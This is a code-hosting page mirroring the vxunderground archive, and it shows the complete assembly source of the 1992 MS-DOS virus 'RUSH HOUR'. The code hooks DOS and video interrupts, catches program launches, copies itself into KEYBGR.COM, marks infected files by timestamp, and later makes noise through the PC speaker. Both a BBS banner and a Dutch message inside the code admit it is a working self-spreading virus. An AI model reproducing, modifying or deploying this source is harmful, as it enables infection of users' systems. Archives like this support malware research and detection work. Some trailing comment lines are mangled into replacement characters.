Mirrors/vxug-MalwareSourceCode
13
1
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode synced 2024-06-28 09:52:32 +00:00
Code Releases Activity
6e867b6ce0
vxug-MalwareSourceCode/MSDOS/Virus.MSDOS.Unknown.rush_vir.asm
vxunderground 5dd4938a52
Add files via upload
2021-01-12 17:58:25 -06:00

243 lines
8.9 KiB
NASM
Raw Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

;****************************************************************************;
; ;
; -=][][][][][][][][][][][][][][][=- ;
; -=] P E R F E C T C R I M E [=- ;
; -=] +31.(o)79.426o79 [=- ;
; -=] [=- ;
; -=] For All Your H/P/A/V Files [=- ;
; -=] SysOp: Peter Venkman [=- ;
; -=] [=- ;
; -=] +31.(o)79.426o79 [=- ;
; -=] P E R F E C T C R I M E [=- ;
; -=][][][][][][][][][][][][][][][=- ;
; ;
; *** NOT FOR GENERAL DISTRIBUTION *** ;
; ;
; This File is for the Purpose of Virus Study Only! It Should not be Passed ;
; Around Among the General Public. It Will be Very Useful for Learning how ;
; Viruses Work and Propagate. But Anybody With Access to an Assembler can ;
; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ;
; Experience can Turn it Into a far More Malevolent Program Than it Already ;
; Is. Keep This Code in Responsible Hands! ;
; ;
;****************************************************************************;
page 72,132
title Virus"RUSH HOUR" (c) Hanx ,1992
name VIRUS
abso segment at 0
org 4*10h
video_int dw 2 dup (?)
org 4*21h
dos_int dw 2 dup (?)
org 4*24h
error_int dw 2 dup (?)
abso ends
code segment
assume cs:code, ds:code, es:code
org 05ch
fcb label byte
drive db ?
fspec db 11 dup (' ')
org 6ch
fsize dw 2 dup (?)
fdate dw ?
ftime dw ?
org 80h
dta dw 128 dup (?)
org 071eh
xor ax,ax
mov es,ax
assume es:abso
push cs
pop ds
mov ax,video_int
mov bx,video_int+2
mov word ptr video_vector,ax
mov word ptr video_vector+2,bx
mov ax,dos_int
mov bx,dos_int+2
mov word ptr dos_vector,ax
mov word ptr dos_vector+2,bx
cli
mov dos_int,offset virus
mov dos_int+2,cs
mov video_int,offset disease
mov video_int+2,cs
sti
mov ah,0
int 1ah
mov time_0,dx
lea dx,virus_einde
int 27h
video_vector dd (?)
dos_vector dd (?)
error_vector dw 2 dup (?)
time_0 dw ?
rndval db 'bfhg'
active db 0
preset db 0
db 'A:'
fname db 'KEYBGR COM'
db 0
virus proc far
assume cs:code, ds:nothing, es:nothing
push ax
push cx
push dx
mov ah,0
INT 1AH
SUB DX,TIME_0
CMP DX,16384
JL $3
MOV ACTIVE,1
$3: pop dx
pop cx
pop ax
cmp ax,4b00h
je $1
exit_1: jmp dos_vector
$1: push es
push bx
push ds
push dx
mov di,dx
mov drive,0
mov al,ds:[di+1]
cmp al,':'
jne $5
mov al,ds:[di]
sub al,'A'-1
mov drive,al
$5: cld
push cs
pop ds
xor ax,ax
mov es,ax
assume ds:code, es:abso
mov ax,error_int
mov bx,error_int+2
mov error_vector,ax
mov error_vector+2,bx
mov error_int,offset error
mov error_int+2,cs
push cs
pop es
assume es:code
lea dx,dta
mov ah,1ah
int 21h
mov bx,11
$2: mov al,fname-1[bx]
mov fspec-1[bx],al
dec bx
jnz $2
lea dx,fcb
mov ah,0fh
int 21h
cmp al,0
jne exit_0
mov byte ptr fcb+20h,0
mov ax,ftime
cmp ax,4800h
je exit_0
mov preset,1
mov si,100h
$4: lea di,dta
mov cx,128
rep movsb
lea dx,fcb
mov ah,15h
int 21h
cmp si,offset virus_einde
jl $4
mov fsize,offset virus_einde -100h
mov fsize+2,0
mov fdate,0AA3h
mov ftime,4800h
lea dx,fcb
mov ah,10h
int 21h
xor ax,ax
mov es,ax
assume es:abso
mov ax,error_vector
mov bx,error_vector+2
mov error_int,ax
mov error_int+2,bx
exit_0: pop dx
pop ds
pop bx
pop es
assume ds:nothing, es:nothing
mov ax,4b00h
jmp dos_vector
virus endp
error proc far
iret
error endp
disease proc far
assume ds:nothing, es:nothing
push ax
push cx
test preset,1
jz exit_2
test active,1
jz exit_2
in al,61h
and al,0feh
out 61h,al
mov cx,3
noise: mov al,rndval
xor al,rndval+3
shl al,1
shl al,1
rcl word ptr rndval,1
rcl word ptr rndval+2,1
mov ah,rndval
and ah,2
in al,61h
and al,0fdh
or al,ah
out 61h,al
loop noise
and al,0fch
or al,1
out 61h,al
exit_2: pop cx
pop ax
jmp video_vector
disease endp
db 'Dit is een demonstratie van een zogenaamd computervirus.'
db 'Het heeft volledige controle over alle systeem-componenten'
db 'en alle harde schijven en in de drive(s) ingevoerde'
db 'diskettes. Het programma kopieert zichzelf naar andere,'
db 'nog niet besmette besturingssystemen en verspreidt zich op'
db 'die manier ongecontroleerd. In dit geval zijn er geen'
db 'programma`s beschadigd of schijven gewist, omdat dit'
db 'slechts een demonstratie is. Een kwaadaardig virus'
db 'had echter wel degelijk schade aan kunnen richten.'
org 1c2ah
virus_einde label byte
code ends
end

;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>;
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> and Remember Don't Forget to Call <<3C><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>;
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <<3C><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>;
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>;
View Git Blame Copy Permalink